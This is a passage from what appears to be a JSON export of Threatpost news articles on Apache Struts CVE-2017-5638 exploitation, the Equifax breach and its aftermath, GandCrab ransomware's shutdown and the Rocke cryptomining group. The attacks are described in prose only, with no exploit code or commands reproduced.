Content-Type value to be executed instead of displayed,\u201d Sellers wrote in an analysis published yesterday.\n\nThe vulnerability was disclosed and patched on Monday, and by Tuesday, Rapid7 was seeing two malicious requests from a host geo-located in Zhengzhou, China. The attacks arrived in HTTP GET requests and issued commands to the vulnerable webserver for it to download binaries from the attacker-controlled server on the internet. Sellers called it a standard command-injection attack against a webserver where the attacker is able to write code that instructs the server to reach out to an IP address and download code that executes on the server.\n\nThe second attack was spotted Wednesday when a host in Shanghai, China sent HTTP POST requests to servers instructing them to disable their firewall and grab code related to the XOR DDoS malware family.\n\n\u201cWhile we\u2019ve seen a couple dozen sources exploiting the vulnerability, only those two issued malicious commands,\u201d Sellers said. \u201cWe\u2019ve actually seen a drop off in related traffic since Wednesday. The most active attacker stopped on Thursday around 4 a.m. U.S. Central time.\u201d\n\nSellers said it\u2019s unclear as to why there\u2019s been a dropoff in malicious traffic.\n\n\u201cIt could be caused by a number of factors. The malicious payload is pretty obvious and easy to filter if traffic is inspected,\u201d Sellers said. \u201cAttackers might be prioritizing other vulnerabilities such as the ones announced in cameras recently. The lull may be temporary and we may see activity rise again after attention moves on to efforts.\u201d\n\nCisco raised the issue of IoT devices running the vulnerable Apache software as well, which could be an indicator of initial interest from DDoS bots.\n\n\u201cGiven the low sample size it\u2019s difficult for me to say.It\u2019s possible that DDoS bots are the early adopters since infection would generate easy, repeatable income and the code was trivial to port to existing frameworks,\u201d Sellers said. \u201cCompare that to ransomware, where a new deployment mechanism may need to be written but would likely only result in a single payout per host.\u201d\n\nResearchers were also seeing a number of requests probing for additional vulnerable servers that included whoami and ifconfig, commands that are relatively benign but could return information about what context the server is running in. Servers running at root\u2014an uncommon practice\u2014are most at risk.\n", "cvss3": {}, "published": "2017-03-10T10:51:01", "type": "threatpost", "title": "Apache Attack Traffic Dropping, Limited to Few Sources", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T16:12:17", "id": "THREATPOST:AACAA4F654495529E053D43901F00A81", "href": "https://threatpost.com/apache-attack-traffic-dropping-limited-to-few-sources/124227/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company\u2019s massive 2017 data breach, including their names and some of their driver\u2019s license information.\n\nThe additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.\n\nThe consumer credit reporting agency on Thursday said that as part of an \u201congoing analysis\u201d it found that these newly identified victims\u2019 names and partial driver\u2019s license numbers were stolen by attackers. However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.\n\nAttackers were also unable to reach additional license details for this latest slew of impacted victims \u2013 including the state where their licenses were issued and the expiration dates.\n\n\u201cThis is not about newly discovered stolen data,\u201d Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement. \u201cIt\u2019s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.\u201d\n\nEquifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver\u2019s license information.\n\n\u201cThe methodology used in the company\u2019s forensic examination of last year\u2019s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,\u201d said the company in a statement. \u201cThis was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.\u201d\n\nEquifax said it will notify the newly identified consumers directly by U.S. Postal mail, \u201cand will offer identity theft protection and credit file monitoring services at no cost to them,\u201d said the company.\n\nThe company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.\n\n**Ongoing Breach Disclosures**\n\nEquifax has been under public scrutiny since September, that\u2019s when it first disclosed the data breach after issuing a statement at the time that cybercriminals had exploited an unnamed \u201cU.S. website application vulnerability to gain access to certain files\u201d from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like social security numbers, birth dates, and license numbers.\n\nLater, during Equifax\u2019s testimony in October before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the \u201capplicable personnel responsible\u201d to update the vulnerability it never was fixed.\n\n\u201cIt appears that the breach occurred because of both human error and technology failures,\u201d Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.\n\nMaking the breach worse was Equifax\u2019s further botched response to the breach.\n\nAfter the breach was revealed in September, the company\u2019s site was crushed with traffic from concerned customers that left the site unreachable. In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner\u2019s Flash Player download.\n\nThe extent and scope of the breach also has been continually expanding since it was first disclosed in September. In October, after an analysis with security company Mandiant, the company said that an [additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.\n\nMeanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayers identification numbers, email addresses, and credit card expiration dates for certain customers.\n\n**Renewed Anger**\n\nThis latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection \u2013 such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.\n\n> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened. \n> \n> We also need to change the law.\n> \n> \u2014 Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)\n\n> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. <https://t.co/fRPrUWcIyg>\n> \n> \u2014 Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)\n\nEquifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.\n\nCustomers can see if their personal information has been breached by clicking on an \u201cAm I Impacted\u201d tool on Equifax\u2019s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.\n\nThe company handles data on more than 820 million customers and 91 million businesses worldwide.\n", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:31", "description": "Equifax, the credit agency behind this summer\u2019s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.\n\nPaulino do Rego Barros, Jr., the company\u2019s interim CEO, [announced Monday](<https://www.equifaxsecurity2017.com/>) that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.\n\nEquifax initially called its investigation around the breach \u201csubstantially complete,\u201d but said it was still carrying out further analysis with Mandiant, a FireEye company it hired to investigate the breach, on the incident. According to Equifax, investigators didn\u2019t find any additional vulnerabilities. The extra 2.5 million Americans figure came \u201cduring Mandiant\u2019s completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\u201d\n\nThe company used the opportunity on Monday to reiterate that Canadian citizens were also impacted, although far fewer than initially thought. The company said there may have been up to 100,000 Canadians affected several weeks ago however upon closer inspection, only 8,000 Canadian consumers were affected by the breach.\n\nEquifax says its still analyzing exactly how many United Kingdom consumers have been affected by the breach and is in the middle discussions with regulators to determine how to notify them.\n\nDetails about the breach came out the day before Richard Smith, Equifax\u2019s former CEO, was scheduled to testify about the breach before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection. Smith, former Equifax chairman and chief executive, [retired last Tuesday](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>) in wake of the breach.\n\nIn a [written testimony (.PDF)](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) released in tandem with the subcommittee hearing, Smith blamed the breach on a combination of \u201chuman error and technology failures.\u201d\n\n\u201cThese mistakes \u2013 made in the same chain of security systems designed with redundancies \u2013 allowed criminals to access over 140 million Americans\u2019 data,\u201d Smith wrote.\n\nIn the testimony Smith claimed that the U.S. Department of Homeland Security\u2019s Computer Emergency Readiness Team (U.S. CERT) notified Equifax on March 8 that [it needed to patch CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), the Apache Struts vulnerability that eventually led to the hack.\n\nEquifax requested the \u201capplicable personnel responsible\u201d update Apache Struts via email on March 9, something that should have been done within a 48 hour period, Smith said.\n\nThat was never done and according to Smith, the vulnerability wasn\u2019t picked up by internal scans designed to identify vulnerable systems carried out on March 15. The issue lingered for roughly two months until attackers accessed Equifax\u2019s systems on May 13 \u2013 and persisted until the company became aware of the attackers on July 30.\n\nGreg Walden (R-Ore.) pointed out some of Equifax\u2019s many missteps on Tuesday morning, including how Equifax\u2019s consumer facing website for the breach was put hosted on a separate domain from the main Equifax website, the confusion that spawned, and how on multiple occasions Equifax directed users to the wrong website.\n\n\u201cOn top of all the other issues, multiple times Equifax tweeted the wrong URL directing consumers to the wrong website to check if they were part of a breach,\u201d Walden said, \u201cTalk about ham-handed responses this is simply unacceptable and it makes me wonder if there was a breach response plan in place at all and if anyone was in charge of executing that plan.\u201d\n\nDuring another part of the hearing, Tim Murphy, a U.S. representative for Pennsylvania\u2019s 18th Congressional district, came back to that question. When told the company\u2019s original site couldn\u2019t handle the traffic is received, Murphy was befuddled.\n\n\u201cWhy wouldn\u2019t your website be able to handle this kind of traffic?\u201d Murphy asked, \u201cIt just doesn\u2019t make sense, a company your size and with your knowledge, doesn\u2019t understand how to handle traffic for over 100 million people, don\u2019t you use an Elastic cloud computing service that would\u2019ve accounted for this?\u201d\n\nSmith said the sheer amount of traffic Equifax\u2019s site received in wake of the breach made hosting a site on its domain impossible.\n\n\u201cThe environment the micro site is in is a cloud environment that\u2019s very, very scalable,\u201d Smith said. \u201cOur traditional environment could not handle 400 million consumer visits for three weeks.\u201d\n\nMurphy also grilled Smith on what took Equifax so long to patch the March vulnerability and if it\u2019s possible Equifax\u2019s internal scanning system could potentially miss another vulnerability.\n\n\u201cIf the patch only took a few days to apply why did Equifax fail to apply it in March when it was announced as critical?\u201d Murphy asked.\n\nSmith skirted the question and instead discussed the difficulties associated with patching.\n\n\u201cPatching can take a variety of time\u2026 it can take days or up to a week or more,\u201d Smith said, adding that he wasn\u2019t aware of the particular Struts vulnerability at the time.\n\nAt the end of the hearing, when pressed by Anna Eshoo, U.S. Representative for California\u2019s 18th congressional district, Smith described the process around patching again but did little to deviate from his prepared testimony.\n\n\u201cI want to know when they did it, when they took care of [the patch]\u201d Eshoo said.\n\n\u201cThey took care of it in July because we never found it,\u201d Smith said. \u201cWe had the human error, we did the scan, the technology never found it, in July we found suspicious activity, took the portal down, found the vulnerability, applied the patch.\u201d\n", "cvss3": {}, "published": "2017-10-03T15:27:08", "type": "threatpost", "title": "Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T15:27:08", "id": "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "href": "https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:42:25", "description": "Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.\n\nThe consumer credit reporting agency on Monday [said](<https://investor.equifax.com/news-and-events/news/2019/07-22-2019-125543228>) it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover consumer losses, the company may need to pay an additional $125 million.\n\n\u201cCompanies that profit from personal information have an extra responsibility to protect and secure that data,\u201d said Federal Trade Commission (FTC) Chairman Joe Simons [in a statement](<https://www.ftc.gov/news-events/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related?utm_source=slider>). \u201cEquifax failed to take basic steps that may have prevented the breach that affected approximately 147 million consumers. This settlement requires that the company take steps to improve its data security going forward, and will ensure that consumers harmed by this breach can receive help protecting themselves from identity theft and fraud.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nEquifax, which handles data associated with more than 820 million customers and 91 million businesses worldwide, has been under public scrutiny since September 2017 when [it disclosed](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) a data breach that impacted almost 150 million Americans. The attackers managed to [access information](<https://threatpost.com/equifax-data-nation-state/141929/>) containing Social Security numbers, birth dates, addresses, and some driver\u2019s license numbers. Equifax said it discovered the intrusion on July 29, meaning attackers apparently had access to the company\u2019s files for nearly 12 weeks.\n\nAfter the data breach, Equifax was hit by multiple lawsuits, as well as investigations by the FTC, the CFPB, the Attorneys General of 48 states, and more.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary.png>)\n\nLawsuits claimed that Equifax failed to patch its network in March 2017 after being alerted of a [critical security flaw](<https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/>) (an Apache Struts vulnerability, CVE-2017-5638) in its Equifax Automated Consumer Interview System database (which handles inquiries from consumers about their personal credit data). This vulnerability was ultimately exploited by bad actors, leading to the data breach.\n\nAs part of the agreement, Equifax also said it will take steps to enhance its information security and technology program, as well as make payments totaling $290.5 million to state and federal regulatory agencies to pay attorneys\u2019 fees and costs in the multi-district litigation.\n\nIn the past month, a slew of fines and penalties have been imposed that were tied privacy and data breach incidents. Earlier in July, the [FTC slapped](<https://threatpost.com/privacy-experts-facebooks-5b-fine/146478/>) a $5 billion fine on Facebook for privacy violations following its Cambridge Analytica incident. Also hit with security-related fines in July were [Marriott](<https://threatpost.com/marriott-123m-fine-data-breach/146320/>) ($123 million) and [British Airways](<https://threatpost.com/post-data-breach-british-airways-slapped-with-record-230m-fine/146272/>) ($230 million).\n\nWhile opinions are mixed about the appropriate penalty for these companies and Equifax, security experts for their part hope that other companies will take note of the fines when it comes to data security and privacy.\n\n\u201cI\u2019m far from an Equifax apologist, but the truth is it could have been anyone,\u201d Adam Laub, chief marketing officer at STEALTHbits Technologies said in an email. \u201cIt\u2019s not an excuse, but rather the reality we live in. The best outcome isn\u2019t Equifax making the situation right \u2013 although that is important for all of those affected \u2013 it\u2019s everyone else learning that the price to be paid outweighs the inconvenience of ensuring proper measures are taken to secure the data that puts them at risk in the first place. And it\u2019s got to be from the ground up too. There\u2019s no silver bullet.\u201d\n\n**_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. _****_[Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)_**\n", "cvss3": {}, "published": "2019-07-22T14:31:39", "type": "threatpost", "title": "Equifax to Pay $700 Million in 2017 Data Breach Settlement", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-07-22T14:31:39", "id": "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "href": "https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:59", "description": "Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nThe vulnerability, [CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday\u2019s disclosure, but since then, the situation has worsened and experts fear it\u2019s going to linger for a while.\n\n\u201cThe second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it\u2019s a ramp-up for rapid exploitation by a large number of people,\u201d said Craig Williams, senior technical leader for Cisco\u2019s Talos research outfit. \u201cWe\u2019re basically seeing a huge number of people continue to exploit the vulnerability. That\u2019s likely going to continue to increase. I think what we\u2019re also going to see is people going to try to scan for the vulnerability.\u201d\n\nThe flaw lives in the Jakarta Multipart parser upload function in Apache. It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).\n\nTalk of the vulnerability surfaced on Chinese forums, according to Vincente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity in which an attacker could inject operating system commands.\n\nThe attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. Williams said it\u2019s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.\n\n\u201c[Attacks] look like requests to a webserver with a malformed piece,\u201d Williams said. \u201cUnless you\u2019re looking for it, it\u2019s easy not to see the malformed content type.\u201d\n\nAn attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.\n\n\u201cUnfortunately, due to the nature of command-line injections like this, it\u2019s very easy to modify,\u201d Williams said. \u201cAnd that\u2019s why I think we\u2019re going to continue to see exploitation rise for the foreseeable future.\u201d\n\nThe risks are severe for an organization running an exposed Apache server if it\u2019s compromised.\n\n\u201cThe sky\u2019s the limit,\u201d Williams said. \u201cIf I\u2019m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I\u2019m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. I could ransom off your webserver, all kinds of terrible things.\u201d\n\nWilliams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the bill gates botnet.\n\nWilliams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.\n\n\u201cI\u2019m going to guess there\u2019s a reasonable number of devices running it, and due to the nature of IoT, those aren\u2019t going to be patched any time soon. So this is going to be an issue for the foreseeable future.\u201d\n\nGiven the availability of patches and detection rules, it\u2019s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.\n\n\u201cDue to the fact that it\u2019s relatively easy to go inside and modify an attack, it\u2019s going to be bad and it\u2019s going to plague us for some time,\u201d Williams said. \u201cGood news is that detecting it is not that difficult.\u201d\n", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:46:10", "description": "The GandCrab ransomware group is shutting down, according to posts on the Dark Web.\n\nResearchers David Montenegro and Damian [spotted the announcements](<https://twitter.com/Damian1338B/status/1134723204566700033>) over the weekend.\n\n> Start of GandCrab Ransomware : 28-1-2018 .. \ud83e\udd80\ud83e\udd80\ud83e\udd80 \nClose of GandCrab Ransomware : 1-6-2019 .. \u2620\ufe0f\u2620\ufe0f\u2620\ufe0f[@Raj_Samani](<https://twitter.com/Raj_Samani?ref_src=twsrc%5Etfw>) [@ValthekOn](<https://twitter.com/ValthekOn?ref_src=twsrc%5Etfw>) [@John_Fokker](<https://twitter.com/John_Fokker?ref_src=twsrc%5Etfw>) [@hasherezade](<https://twitter.com/hasherezade?ref_src=twsrc%5Etfw>) [@VK_Intel](<https://twitter.com/VK_Intel?ref_src=twsrc%5Etfw>) [@James_inthe_box](<https://twitter.com/James_inthe_box?ref_src=twsrc%5Etfw>) [@luca_nagy_](<https://twitter.com/luca_nagy_?ref_src=twsrc%5Etfw>) [@Bitdefender](<https://twitter.com/Bitdefender?ref_src=twsrc%5Etfw>) [@Europol](<https://twitter.com/Europol?ref_src=twsrc%5Etfw>) [@campuscodi](<https://twitter.com/campuscodi?ref_src=twsrc%5Etfw>) [@tamas_boczan](<https://twitter.com/tamas_boczan?ref_src=twsrc%5Etfw>) [@JayTHL](<https://twitter.com/JayTHL?ref_src=twsrc%5Etfw>) [@demonslay335](<https://twitter.com/demonslay335?ref_src=twsrc%5Etfw>) [@struppigel](<https://twitter.com/struppigel?ref_src=twsrc%5Etfw>) [pic.twitter.com/kkrhKUunDX](<https://t.co/kkrhKUunDX>)\n> \n> \u2014 CryptoInsane (@CryptoInsane) [June 1, 2019](<https://twitter.com/CryptoInsane/status/1134727041826377729?ref_src=twsrc%5Etfw>)\n\nNoting that \u201call good things come to an end,\u201d GandCrab\u2019s operators in a posting on the exploit[.]in underground market claim the malware has raked in nearly $2 billion since the ransomware launched in January of last year. That encompasses ransomware-as-a-service (RaaS) earnings as well as $150 million for the operators themselves. They said they were averaging $2.5 million per week.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nYet, despite all of this success \u2013 and perhaps due to more [GandCrab decryptors](<https://www.nomoreransom.org/en/decryption-tools.html>) popping up to [help businesses combat infections](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) \u2013 the group said that it is suspending their servers, ads and infrastructure.\n\nThe operators also warned, \u201cVictims, if you buy, now. Then your data no one will recover. Keys will be deleted.\u201d\n\nMichael Gillespie, Emsisoft researcher and creator of the ID Ransomware service, told Threatpost: \u201cThe number of GrandCrab submissions to ID Ransomware has been trending downwards for some time. I think they\u2019re doing like the TeslaCrypt devs; getting out while the going is good and sailing away on their yachts. Unfortunately, no-one will ever be able to decrypt unless the criminals release the keys for the more recent variants.\u201d\n\n## GandCrab: A Swiftly Moving Malware\n\nGandCrab is a fairly standard ransomware in that it scans infected Windows systems and any network shares for files to encrypt. It\u2019s recognizable by the \u201c.gdcb\u201d extension that it appends to encrypted files.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/03101107/GrandCrab-Closing-Message.png>)\n\nYet in the 16 months since its debut, it has become [one of the most prolific ransomware strains](<https://threatpost.com/banking-trojans-top-threat-email/141814/>) out there, as GandCrab\u2019s operators have also continued to evolve its code (there are five versions) and [infection vectors](<https://threatpost.com/gandcrabs-rotten-eggs-hatch-ransomware-in-south-korea/136689/>).\n\nThose operators specialized in the RaaS model, according to researchers, and partnering with botnet operators and other affiliate cybercriminals \u2013 which helps account for its widespread virulence. It spreads in various ways, including via spam emails, exploit kits, targeted social engineering efforts, fake software downloads and malicious websites; and it was recently spotted as the final payload for [a series of attacks](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) that exploit the recently patched, critical Oracle WebLogic bug, CVE-2019-2725.\n\nSome attackers have customized the code as well; recently for example Bromium [identified](<https://www.bromium.com/gandcrab-ransomware-code-hiding-in-image>) a new PowerShell technique being used to spread GandCrab that uses Excel documents and an image of Super Mario to infect machines. It only attacked Windows computers in Italy, and was coded to not execute if the infection landed in a different geography.\n\n\u201cAnalysis showed PowerShell code launching from malicious Excel spreadsheets, which are freshly rewrapped to avoid detection by signature-based security tools,\u201d Bromium explained in its blog on the campaign, in May. \u201cThe script is then used to download a picture of Super Mario which contains more PowerShell code that ultimately downloads GandCrab ransomware, encrypting files and network assets. By hiding the ransomware within images, it makes it nearly impossible for perimeter detection to work out if there is something malicious within the code.\u201d\n\nDespite their successful 16-month run, GandCrab\u2019s operators are ready to retire, they said.\n\n\u201cWe successfully cashed this money and legalized it in various spheres of white business,\u201d they posted. \u201cWe are leaving for a well-deserved retirement. We have proven that by doing evil deeds, retribution does not come. We proved that in a year, you can earn money for a lifetime.\u201d\n", "cvss3": {}, "published": "2019-06-03T14:18:01", "type": "threatpost", "title": "GandCrab Ransomware Shutters Its Operations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-06-03T14:18:01", "id": "THREATPOST:3E82813FD33FCC5937E06B9D667A547A", "href": "https://threatpost.com/gandcrab-ransomware-shutters/145267/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T05:51:17", "description": "Researchers are warning of a Chinese-language threat actor leveraging a wide array of Git repositories to infect vulnerable systems with Monero-based cryptomining malware.\n\nResearchers at Cisco Talos, who discovered the threat actor they call \u201cRocke\u201d, said they have been tracking the adversary since April as it continues to plant various Monero miners on vulnerable systems. Rocke\u2019s hallmark is the enlisting of toolkits that leverage Git repositories, HTTP File Servers (HFS) and a myriad of different payloads. The name Rocke was derived the the group\u2019s Monero wallet that includes \u201crocke@live.cn\u201d.\n\n\u201cRocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines,\u201d the research team said in a [post](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) Thursday. \u201cIt is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware.\u201d\n\nCisco Talos said it first spotted the threat actor in April 2018 when its malware was found in both Western and Chinese honeypots attempting to exploit the an Apache Struts vulnerability.\n\nA user named \u201cc-000\u201d first downloaded several files to the researchers\u2019 Struts 2 honeypot from the Chinese repository site (Gitee.com), researchers said. At the same time another user named \u201cc-18\u201d pulled down files in similar activity from a GitLab.com repository page. The repositories on both Gitee and GitLab were identical, leading researchers to determine they were the same actor. The repositories also contained similar files such as an array of ELF executables, shell scripts, and text files. Each executed and a variety of Monero-based cryptocurrency miners.\n\n\u201cAfter months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors,\u201d wrote David Liebenberg, senior threat analyst, who authored the Cisco Talos report.\n\nResearchers said they found the same threat actor exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting a critical Java deserialization vulnerability in the Adobe ColdFusion platform (CVE-2017-3066).\n\n## Recent Campaigns\n\nAs recently as late July, researchers said they discovered another similar campaign on their Struts 2 honeypot. The honeypot received a wget request (a command for downloading files from the internet) for a file called \u201c0720.bin.\u201d When researchers did some digging and visited the host this file was located on, they discovered that it contained a slew of additional files, including shell scripts and cryptominers.\n\nThose files included an Executable and Linkable (ELF) file called \u201c3307.bin,\u201d a shell script called \u201ca7\u201d that kills a variety of processes related to other cryptomining malware, as well as shell scripts \u201clowerv2.sh\u201d and \u201crootv2.sh,\u201d which attempt to download and execute cryptomining malware.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/30151343/talos.png>)\n\nThey also found a file called \u201cconfig.json,\u201d which is a mining config file for open-source Monero miner XMRig. Another file, \u201cPools.txt,\u201d appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. Both miners have the same mining pool and wallet information.\n\nOther miners in the files include \u201cBashf,\u201d a variant of XMR-stak, and \u201cbashg,\u201d a variant of XMRig.\n\nFinally, Cisco Talos said it found a file dubbed \u201cTermsHost.exe,\u201d a PE 32 Monero miner, which researchers said can be purchased online for $14 and targets malicious actors: \u201cAdvertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \u2018Windows processes to bypass firewalls,'\u201d Liebenberg wrote.\n\nThe sample first grabs the config file \u201cxmr.txt\u201d containing the same configuration information as the previous files, from Rocke\u2019s command-and-control (C2) server, and then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool.\n\n\u201cIntriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system,\u201d researchers said.\n\n## Threat 